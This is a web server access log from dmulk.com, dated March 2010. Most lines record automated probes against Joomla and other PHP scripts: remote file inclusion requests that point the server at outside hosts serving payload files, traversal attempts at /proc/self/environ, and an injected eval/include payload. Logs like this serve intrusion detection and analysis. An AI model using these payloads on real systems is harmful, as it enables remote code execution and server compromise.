216.114.107.92 - - [12/Mar/2010:09:36:42 -0800] "GET /blog/index.php?slideshow=true&gid=20&891 HTTP/1.1" 200 11455 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "dmulk.com"
220.80.108.81 - - [12/Mar/2010:09:36:51 -0800] "GET /logs/access_080619.log//include/admin.lib.inc.php?site_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:09:36:51 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:09:36:52 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.136.23.172 - - [12/Mar/2010:09:37:02 -0800] "GET /include.php?path[docroot]=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.136.23.172 - - [12/Mar/2010:09:37:02 -0800] "GET /logs/access_080304.log%20%20//include.php?path[docroot]=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.136.23.172 - - [12/Mar/2010:09:37:03 -0800] "GET /logs//include.php?path[docroot]=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:37:11 -0800] "GET /logs/access_081104.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:37:16 -0800] "GET /logs/access_081104.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.136.23.172 - - [12/Mar/2010:09:37:21 -0800] "GET /logs/access_081009.log%20%20//include.php?path[docroot]=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:37:38 -0800] "GET /logs/access_091115.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
204.202.2.23 - - [12/Mar/2010:09:37:39 -0800] "GET /logs/access_091031.log/index.php?error=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:37:40 -0800] "GET /logs/access_091115.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:38:15 -0800] "GET /skin/zero_vote/error.php?dir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:38:15 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:38:15 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.111.95.42 - - [12/Mar/2010:09:38:22 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.etegro.com/kz//includes/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.111.95.42 - - [12/Mar/2010:09:38:22 -0800] "GET /logs/access_081227.log///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.etegro.com/kz//includes/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.111.95.42 - - [12/Mar/2010:09:38:22 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.etegro.com/kz//includes/id.txt???? HTTP/1.1" 200 15048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:38:33 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:38:33 -0800] "GET /logs/access_090506.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:38:33 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:38:33 -0800] "GET /index2.php?mosConfig_absolute_path=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:38:36 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:38:36 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
204.202.2.23 - - [12/Mar/2010:09:38:43 -0800] "GET /logs/access_081230.log/index.php?error=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:38:46 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:38:46 -0800] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:38:46 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:38:46 -0800] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:38:56 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:38:56 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:38:56 -0800] "GET /logs/access_080221.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:39:00 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:39:00 -0800] "GET /logs/access_080221.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:39:00 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:39:09 -0800] "GET /logs/access_080319.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:39:10 -0800] "GET /logs/access_090113.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:09:39:10 -0800] "GET /com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:39:11 -0800] "GET /logs/access_080319.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:39:12 -0800] "GET /logs/access_090113.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:09:39:16 -0800] "GET /logs/access_100112.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:09:39:16 -0800] "GET /logs/access_080422.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:09:39:16 -0800] "GET /logs//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:39:18 -0800] "GET /index3.php?lang=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.dmulk.com"
193.111.95.42 - - [12/Mar/2010:09:39:25 -0800] "GET /logs/access_081010.log///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.etegro.com/kz//includes/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:39:56 -0800] "GET /logs/access_090717.log/index3.php?lang=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:39:57 -0800] "GET /index3.php?lang=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:39:57 -0800] "GET /logs/index3.php?lang=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:40:01 -0800] "GET /logs/access_080122.log/index3.php?lang=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.dmulk.com"
124.136.23.172 - - [12/Mar/2010:09:40:26 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.136.23.172 - - [12/Mar/2010:09:40:26 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.136.23.172 - - [12/Mar/2010:09:40:26 -0800] "GET /skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:40:37 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:40:37 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:40:37 -0800] "GET /logs/access_090424.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:40:37 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:40:37 -0800] "GET /logs/access_090424.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:40:37 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:40:39 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:40:39 -0800] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:40:39 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:40:41 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:40:41 -0800] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:40:41 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:40:51 -0800] "GET /logs/access_080319.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:40:52 -0800] "GET /logs/access_080319.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:40:55 -0800] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:40:55 -0800] "GET /logs/access_090826.log//administrator/components/com_moofaq/css/file_includer.php?file=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:40:55 -0800] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.136.23.172 - - [12/Mar/2010:09:40:56 -0800] "GET /logs/access_071228.log%20%20//skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.136.23.172 - - [12/Mar/2010:09:40:56 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.136.23.172 - - [12/Mar/2010:09:40:56 -0800] "GET /skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.136.23.172 - - [12/Mar/2010:09:40:57 -0800] "GET /logs/access_090925.log%20%20//skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:41:04 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:41:23 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:41:23 -0800] "GET /logs/access_090506.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:41:24 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:41:29 -0800] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:41:29 -0800] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:41:29 -0800] "GET /logs/access_091021.log%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:41:33 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:41:35 -0800] "GET /logs/access_091129.log//administrator/components/com_moofaq/css/file_includer.php?file=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:41:38 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:41:38 -0800] "GET /logs/access_090506.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:41:38 -0800] "GET /logs/access_081026.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:41:56 -0800] "GET /logs/access_090620.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:42:03 -0800] "GET /logs/access_090506.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:42:03 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:42:10 -0800] "GET /logs/access_090107.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:42:10 -0800] "GET /logs/access_081103.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:09:42:11 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:09:42:11 -0800] "GET /logs/access_080320.log/modules/My_eGallery/index.php?basepath=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:09:42:11 -0800] "GET /modules/My_eGallery/index.php?basepath=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:42:27 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:42:27 -0800] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:42:27 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:43:03 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:43:03 -0800] "GET /logs/access_081001.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:43:08 -0800] "GET /logs/access_090107.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:43:08 -0800] "GET /logs/access_081103.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:09:43:19 -0800] "GET /logs/access_090908.log/myevent.php?myevent_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:09:43:19 -0800] "GET /logs/myevent.php?myevent_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:09:43:19 -0800] "GET /myevent.php?myevent_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:09:43:21 -0800] "GET /logs/access_080120.log%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:09:44:12 -0800] "GET /logs/access_080131.log%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:44:12 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:44:12 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
